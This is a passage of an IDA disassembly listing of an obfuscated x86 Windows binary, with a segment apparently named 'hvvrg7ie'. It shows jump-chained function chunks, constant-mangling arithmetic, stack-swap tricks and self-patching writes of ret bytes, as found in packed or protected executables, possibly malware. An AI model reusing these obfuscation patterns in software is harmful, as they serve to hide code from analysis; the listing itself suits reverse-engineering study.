; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4436BA:				; CODE XREF: sub_43F227+3E58j
		jge	loc_439EB0
		sub	edx, 41418D7Dh
		xchg	edi, [ecx]
		rol	ebp, 19h

loc_4436CB:				; CODE XREF: sub_43F227:loc_43E057j
		push	9EAF0685h
		pop	eax
		jmp	loc_44CCFE
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_4436D6:				; CODE XREF: sub_449CB1j
		mov	eax, ds:dword_439E58
		or	eax, eax
		jnz	loc_451DD3
		jmp	loc_4417BC
; END OF FUNCTION CHUNK	FOR sub_449CB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_4436E9:				; CODE XREF: sub_45A234-82Bj
		jnp	loc_4399E9
		sbb	edx, ebp
		cmp	ebx, edx
		jmp	loc_4501A3
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_4436F8:				; CODE XREF: sub_448100+12AD5j
		mov	esi, eax
		xchg	esi, [esp+0]
		ror	eax, 9

loc_443700:				; CODE XREF: sub_45B938+Ej
		mov	ds:dword_448CF4, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_443707:				; CODE XREF: sub_445934:loc_443242j
					; hvvrg7ie:0045994Ej
		rol	eax, 9
		jmp	loc_44A04C
; END OF FUNCTION CHUNK	FOR sub_445934

; =============== S U B	R O U T	I N E =======================================



sub_44370F	proc near		; CODE XREF: sub_44CF13p
					; sub_44370F:loc_451C5Fj ...

var_8		= dword	ptr -8
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B043 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043D21D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00440C39 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442482 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442974 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00443681 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444FC6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044A404 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044ACC6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B7A9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044BD57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004500DF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00451C5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451F2D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453419 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00455A1C SIZE 00000011 BYTES

		jns	loc_43D234
		pop	edx
		mov	eax, [esp+8+var_8]
		push	ebp
		xor	ebp, 6E905519h
		jmp	loc_44A404
sub_44370F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_443725:				; CODE XREF: sub_453422:loc_440250j
		jz	loc_459732

loc_44372B:				; CODE XREF: sub_43AAE4+177DFj
		jmp	loc_447306
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4446E9

loc_443730:				; CODE XREF: sub_4446E9+1Dj
		jmp	nullsub_49
; END OF FUNCTION CHUNK	FOR sub_4446E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_443735:				; CODE XREF: sub_44388C-732Fj
		jmp	nullsub_206
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
		jl	loc_43EC5C
		jmp	loc_45972D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449387

loc_443745:				; CODE XREF: sub_449387-4FE3j
		shl	ecx, 0Fh
		xchg	edx, [ebx]
; END OF FUNCTION CHUNK	FOR sub_449387
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_44374A:				; CODE XREF: sub_4554E8-850j
		jge	loc_4517A7

loc_443750:				; CODE XREF: sub_449387:loc_445A8Dj
		mov	eax, [esp+0]
		push	esi
		mov	esi, eax
		jmp	loc_44D522
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_44375B:				; CODE XREF: sub_450AA8-16F6j
		jz	loc_455948
		jmp	loc_450619
; END OF FUNCTION CHUNK	FOR sub_450AA8

; =============== S U B	R O U T	I N E =======================================



sub_443766	proc near		; DATA XREF: hvvrg7ie:0044C011o
		rol	eax, 17h
		add	eax, 381AE575h
		xor	eax, 0D0439D7Ch
		rol	eax, 14h
		jmp	loc_443D8F
sub_443766	endp

; ---------------------------------------------------------------------------

loc_44377D:				; CODE XREF: hvvrg7ie:loc_45001Aj
		mov	eax, ds:dword_44BCA0
		or	eax, eax
		jnz	loc_43D98A
		jmp	loc_44B92B
; ---------------------------------------------------------------------------

loc_443790:				; CODE XREF: hvvrg7ie:0043DDB6j
		jnb	loc_442DF2
; START	OF FUNCTION CHUNK FOR sub_44290B

loc_443796:				; CODE XREF: sub_44290B:loc_43A125j
		xor	eax, 5A1466F9h
		call	sub_450C5A
		push	edi
		push	0CC1649A4h
		pop	edi
		jmp	loc_4577E1
; END OF FUNCTION CHUNK	FOR sub_44290B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_4437AD:				; CODE XREF: sub_44388C:loc_44D96Cj
		or	edx, 0B2AD4FE8h
		rol	edx, 4
		xor	edx, 0C35D4559h
		add	edx, ebp
		push	edi
		push	0CA422BABh
		pop	edi
		jmp	loc_44BCA9
; END OF FUNCTION CHUNK	FOR sub_44388C

; =============== S U B	R O U T	I N E =======================================



sub_4437CA	proc near		; CODE XREF: hvvrg7ie:0043D0EBj
					; hvvrg7ie:0043F2DEp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004425FE SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044C17A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457D17 SIZE 00000008 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_458D36
		push	0D9874C78h
		pop	eax
		rol	eax, 1Dh
		jmp	loc_4425FE
sub_4437CA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A5F4

loc_4437E5:				; CODE XREF: sub_45A5F4+3j
		xchg	edx, [esp+4+var_4]
		mov	ebp, esp
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp+8+var_8]
		mov	esp, ebp
		jmp	loc_44E1F0
; END OF FUNCTION CHUNK	FOR sub_45A5F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4437F7:				; CODE XREF: sub_440643+12283j
		jz	loc_4584BC
		jmp	loc_44FBB4
; END OF FUNCTION CHUNK	FOR sub_440643

; =============== S U B	R O U T	I N E =======================================



sub_443802	proc near		; CODE XREF: sub_447DF9+D44Bj
					; sub_447DF9:loc_459FD5j
		push	ebx
		push	0B7E5DC74h
		pop	ebx
		sub	ebx, 0D87823C9h
		rol	ebx, 17h
		push	offset sub_440BE2
		jmp	nullsub_394
sub_443802	endp

; ---------------------------------------------------------------------------

loc_44381C:				; DATA XREF: sub_443A70+3o
		push	ecx
		pop	ebp
		pop	ecx
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_443820:				; CODE XREF: sub_455ACA+12D6j
		jmp	nullsub_288
; END OF FUNCTION CHUNK	FOR sub_455ACA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_113. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_443826:				; CODE XREF: sub_45A234-161C1j
		jmp	loc_44EDD9
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------

locret_44382B:				; CODE XREF: hvvrg7ie:00439409j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_44382C:				; CODE XREF: sub_45202B:loc_45320Cj
		xor	ebx, 66D03B30h
		sub	ebx, 0E175E123h
		add	ebx, 0C099FC2Ah
		xchg	ebx, [esp+0]
		jmp	loc_45677F
; END OF FUNCTION CHUNK	FOR sub_45202B
; ---------------------------------------------------------------------------

loc_443846:				; CODE XREF: hvvrg7ie:0043D40Dj
		test	esi, ebx
		jmp	loc_43EB0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F7CF

loc_44384D:				; CODE XREF: sub_44F7CF-163EEj
		mov	ebp, ecx
		xchg	ebp, [esp+8+var_8]
		mov	[ebp-4], eax
		push	23B30786h
		pop	eax
		jmp	loc_44A4BF
; END OF FUNCTION CHUNK	FOR sub_44F7CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_443860:				; CODE XREF: sub_43E128+15D83j
		or	edx, esi
		test	edx, esi
		jmp	loc_441B3E
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_443869:				; CODE XREF: sub_441E23+8j
		jz	loc_44DF49
		jmp	loc_447E8B
; END OF FUNCTION CHUNK	FOR sub_441E23

; =============== S U B	R O U T	I N E =======================================



sub_443874	proc near		; DATA XREF: sub_4508B6-7BDDo

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00446742 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448E55 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044D51D SIZE 00000005 BYTES

		push	113E2772h
		pop	edx
		add	edx, 8F4E667Dh
		and	edx, 19FEE345h
		jmp	loc_446742
sub_443874	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_80. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44388C	proc near		; DATA XREF: sub_454E54:loc_4556F0o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439882 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043AD1D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043C031 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C54D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043C5B0 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043D193 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043ED12 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043ED59 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F1A6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F46C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00442012 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00442A4B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00443735 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004437AD SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00444F11 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445297 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446D88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044756F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044894F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449832 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449F6A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044BCA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C3DC SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044C47B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D6E4 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044D96C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DEB9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045063B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045136E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453196 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454C30 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004564C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459491 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00459E6D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A0CC SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0045A5DD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045B1D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B954 SIZE 0000001C BYTES

		xchg	esi, [esp+4+var_4]
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jmp	loc_43C54D
sub_44388C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_44389C:				; CODE XREF: sub_44C072+4436j
		jl	nullsub_124
		xchg	ecx, [esi]
		ja	loc_43E3C7

loc_4438AA:				; CODE XREF: hvvrg7ie:loc_443927j
		add	esi, 15D10BFBh
		jmp	loc_456B43
; END OF FUNCTION CHUNK	FOR sub_44C072
; ---------------------------------------------------------------------------

loc_4438B5:				; CODE XREF: hvvrg7ie:loc_43A083j
		mov	ecx, eax
		pop	eax
		pop	ebp
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_4438BA:				; CODE XREF: sub_45889B-DC68j
		jmp	loc_44B467
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_4438BF:				; CODE XREF: hvvrg7ie:00443B20j
		jmp	loc_44B75B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_330. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_4438C5:				; CODE XREF: sub_440AD9+FDC4j
		jmp	loc_44348D
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_4438CA:				; CODE XREF: sub_449D38-F61Fj
		sub	edx, 38C905C9h
		test	edx, 40000h

loc_4438D6:				; CODE XREF: hvvrg7ie:0044916Fj
		jmp	loc_439598
; END OF FUNCTION CHUNK	FOR sub_449D38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443D2B

loc_4438DB:				; CODE XREF: sub_443D2B:loc_439823j
		mov	eax, [ebp+arg_0]
		cmp	dword ptr [eax-4], 4
		jnz	loc_4438F1
		add	[ebp+var_8], 4
		jmp	loc_43982C
; ---------------------------------------------------------------------------

loc_4438F1:				; CODE XREF: sub_443D2B-449j
		add	[ebp+var_8], 2
		jmp	loc_43982C
; END OF FUNCTION CHUNK	FOR sub_443D2B

; =============== S U B	R O U T	I N E =======================================



sub_4438FA	proc near		; CODE XREF: sub_441C58+4p
					; sub_43A0EC+D1E9p

; FUNCTION CHUNK AT 00445EE9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004474E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA5C SIZE 0000001C BYTES

		push	ebp
		jmp	loc_445EE9
sub_4438FA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443B00

loc_443900:				; CODE XREF: sub_443B00+C32j
		push	870D991Ah
		pop	eax
		or	eax, 96DA6630h
		sub	eax, 80A45FCFh
		jmp	loc_439F1D
; END OF FUNCTION CHUNK	FOR sub_443B00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_443917:				; CODE XREF: sub_45038B:loc_4503ADj
		xchg	esi, [esp+0Ch+var_C]
		mov	[ebp-4], eax
		push	offset sub_4547E8
		jmp	loc_43CB40
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------

loc_443927:				; CODE XREF: hvvrg7ie:0043C7F6j
		jl	loc_4438AA
		pushf
		jmp	loc_455A38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A2A5

loc_443933:				; CODE XREF: sub_43A2A5+Cj
		add	esi, 38304959h
		rol	esi, 15h
		push	offset sub_43C362
		jmp	loc_43F53C
; END OF FUNCTION CHUNK	FOR sub_43A2A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451DFF

loc_443946:				; CODE XREF: sub_451DFF-41BAj
		xchg	eax, [esp+0Ch+var_C]
		push	978335Ch
		xchg	ebp, [esp+10h+var_10]
		mov	edx, ebp
		pop	ebp
		and	edx, 8615ECADh
		sub	edx, ds:4000F9h

loc_443960:				; CODE XREF: hvvrg7ie:004459E3j
		add	edx, 19F9BC7Bh
		jmp	loc_4479D0
; END OF FUNCTION CHUNK	FOR sub_451DFF
; ---------------------------------------------------------------------------
		mov	ds:off_41D070, eax
		lea	eax, sub_4507AA

loc_443977:				; CODE XREF: hvvrg7ie:00453F2Cj
		mov	byte ptr [eax],	0C3h
		jmp	sub_4507AA

; =============== S U B	R O U T	I N E =======================================



sub_44397F	proc near		; CODE XREF: sub_40D06E+40p
					; sub_410B0B+2Dp ...
		call	sub_45B261

loc_443984:				; CODE XREF: hvvrg7ie:0043AA61j
					; hvvrg7ie:00442386j
		jmp	nullsub_45
sub_44397F	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_518. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44398A	proc near		; CODE XREF: hvvrg7ie:00439486j
					; sub_43B547:loc_43D1C7p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439A78 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043AAB3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CF9F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00440536 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444B0A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004478DB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00447EE3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448B81 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044A0BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B831 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C1AA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C246 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EC5D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00451554 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451BDF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045241E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00454255 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456515 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045671E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458CDC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045A72C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045AC39 SIZE 0000001A BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	esi, 9A981706h
		xchg	esi, [esp+0]
		jmp	loc_451554
sub_44398A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_44399C:				; CODE XREF: sub_43CD0B+531Fj
		jb	loc_43A6A0
		rol	eax, 12h
		not	edi
		add	ecx, 0C0BEDCB4h

loc_4439AD:				; CODE XREF: sub_43CD0B:loc_4413B6j
		push	offset loc_45B50C
		jmp	nullsub_497
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------

loc_4439B7:				; CODE XREF: hvvrg7ie:0045021Aj
		ror	ebp, 7
; START	OF FUNCTION CHUNK FOR sub_450590

loc_4439BA:				; CODE XREF: sub_450590:loc_45020Ej
		xor	esi, 0C37AEBB5h
		popf
		call	sub_44F548
; END OF FUNCTION CHUNK	FOR sub_450590
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4439C6:				; CODE XREF: sub_43D285+49E7j
		jmp	loc_44BB9F
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		or	edx, 7F7571F0h
		jmp	sub_45535C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4439D6:				; CODE XREF: sub_43D285:loc_458119j
					; hvvrg7ie:0045812Dj
		add	edi, 54BD8A43h
		test	edi, 400000h
		jmp	loc_4463EE
; END OF FUNCTION CHUNK	FOR sub_43D285

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4439E7	proc near		; CODE XREF: sub_44BF29j

; FUNCTION CHUNK AT 004533A5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00453C63 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_45A8AC
		or	eax, eax
		jnz	loc_459EB0
		jmp	loc_453C63
sub_4439E7	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_443A00	proc near		; CODE XREF: hvvrg7ie:loc_43D741p
					; hvvrg7ie:0045B578j
		xchg	esi, [esp+0]
		pop	esi
sub_443A00	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_443A04:				; CODE XREF: sub_443BCD-9D3Aj
		ror	eax, 11h
		push	offset sub_4512BC
		jmp	nullsub_182
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_443A11:				; CODE XREF: sub_43DB4C+1BA0Bj
		jno	loc_44D685

loc_443A17:				; CODE XREF: sub_43DB4C:loc_459D90j
		call	sub_44DE0A
		push	0A495B989h
		pop	edx
		add	edx, 98DFE85Dh
		test	edx, 400000h
		jmp	loc_4409C7
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_443A33:				; CODE XREF: sub_4403B6:loc_448E88j
		sub	edi, 58D4F312h
		xor	edi, 8072EB45h
		add	eax, edi
		pop	edi
		call	sub_440AD9

loc_443A47:				; CODE XREF: sub_439549+1C19Aj
		or	eax, 0ABD3379h
		sub	eax, 0D20F0C27h
		or	eax, 78C9F840h
		add	eax, 8349DAF4h
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_45960A
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45028F

loc_443A68:				; CODE XREF: sub_45028F:loc_43AC2Bj
		xchg	ebx, [esp+4+var_4]
		jmp	loc_4529D5
; END OF FUNCTION CHUNK	FOR sub_45028F

; =============== S U B	R O U T	I N E =======================================



sub_443A70	proc near		; DATA XREF: sub_452FB4+5o
		xchg	ecx, [esp+0]
		push	offset loc_44381C
		jmp	nullsub_164
sub_443A70	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B2AC

loc_443A7D:				; CODE XREF: sub_45B2AC:loc_459DCEj
		push	edx
		push	0E4A7C892h
		xchg	ebp, [esp+8+var_8]
		mov	edx, ebp
		pop	ebp
		or	edx, 3E4EB55Bh
		jmp	loc_440D53
; END OF FUNCTION CHUNK	FOR sub_45B2AC
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D144
; ---------------------------------------------------------------------------

loc_443A9A:				; CODE XREF: hvvrg7ie:0044FF33j
		jmp	loc_43A6BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_443A9F:				; CODE XREF: sub_4554E8-1A4F4j
		jmp	loc_452C00
; END OF FUNCTION CHUNK	FOR sub_4554E8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jns	loc_449A0F
		mov	eax, [esp]
		jmp	loc_444813
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_443AB3:				; CODE XREF: sub_45B048-C46Cj
		ror	ecx, 14h
		test	eax, 722D005Bh
		jmp	loc_445EF9
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------

loc_443AC1:				; CODE XREF: hvvrg7ie:00453114j
		test	esi, eax
		jmp	loc_4547B3
; ---------------------------------------------------------------------------

loc_443AC8:				; DATA XREF: hvvrg7ie:00441679o
		pop	esi
		lea	eax, loc_4390B8
		mov	byte ptr [eax],	0C3h
		jmp	loc_44FCE4

; =============== S U B	R O U T	I N E =======================================



sub_443AD7	proc near		; CODE XREF: sub_419430+67p
					; sub_443AD7+5j
					; DATA XREF: ...
		call	sub_443AE2
		jmp	ds:off_41D1EC
sub_443AD7	endp


; =============== S U B	R O U T	I N E =======================================



sub_443AE2	proc near		; CODE XREF: sub_44CEC8-FB4Aj
					; sub_443AD7p ...

; FUNCTION CHUNK AT 00442858 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F577 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045329A SIZE 00000005 BYTES

		pop	edx
		jmp	loc_45329A
sub_443AE2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_443AE8:				; CODE XREF: sub_450F97-14849j
		jnz	loc_45A148
		jmp	loc_44AB73
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
		jnb	loc_43B289
		not	esi
		jmp	loc_43B2A1

; =============== S U B	R O U T	I N E =======================================



sub_443B00	proc near		; CODE XREF: sub_456118-1B25Bp
					; hvvrg7ie:0044D8C7j

; FUNCTION CHUNK AT 00439F1D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043E3C1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443900 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444723 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D9C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EE35 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451043 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00451765 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0EF203CA5h

loc_443B09:				; CODE XREF: hvvrg7ie:0043D03Fj
		pop	eax
		add	eax, ds:4000F1h
		jmp	loc_451765
sub_443B00	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_443B15:				; CODE XREF: sub_444BE1:loc_4482CEj
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_443B17:				; CODE XREF: sub_455ACA+4j
		jmp	loc_446A32
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------

loc_443B1C:				; CODE XREF: hvvrg7ie:00443073j
					; hvvrg7ie:0044CBA6j
		mov	byte ptr [ebp-5], 0
		jmp	loc_4438BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDCF

loc_443B25:				; CODE XREF: sub_43BDCF:loc_44F4A3j
					; sub_442B5C+12DBEj
		mov	eax, 11h
		call	sub_44B69F
		jmp	loc_442E10
; END OF FUNCTION CHUNK	FOR sub_43BDCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_443B34:				; CODE XREF: sub_449425:loc_44AFAEj
		pop	esi
		add	eax, 0E79E7953h
		jmp	loc_440E8F
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_443B40:				; CODE XREF: sub_44B3F1j
		mov	eax, ds:dword_451E64
		or	eax, eax
		jnz	loc_44B90B
		jmp	loc_45496E
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450C5A

loc_443B53:				; CODE XREF: sub_450C5A-624j
		sbb	ebp, 943C834Ah

loc_443B59:				; CODE XREF: sub_450C5A:loc_43F5C1j
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		lea	eax, dword_4589FC
		push	eax
		push	edx
		jmp	loc_43E03D
; END OF FUNCTION CHUNK	FOR sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_443B6C:				; CODE XREF: sub_45889B:loc_453090j
		jbe	loc_4549C2
		jmp	loc_4520E3
; END OF FUNCTION CHUNK	FOR sub_45889B

; =============== S U B	R O U T	I N E =======================================



sub_443B77	proc near		; CODE XREF: hvvrg7ie:004393ECj
					; hvvrg7ie:004529DBp
		xchg	ebx, [esp+0]
		pop	ebx
sub_443B77	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_454099

loc_443B7B:				; CODE XREF: sub_454099-CBAFj
		push	0C766EB86h
		adc	ecx, 1298B3EAh
		jmp	loc_439000
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_443B8B:				; CODE XREF: sub_445CCD-BEF9j
		xchg	edx, [esp+8+var_8]
		jmp	sub_44059F
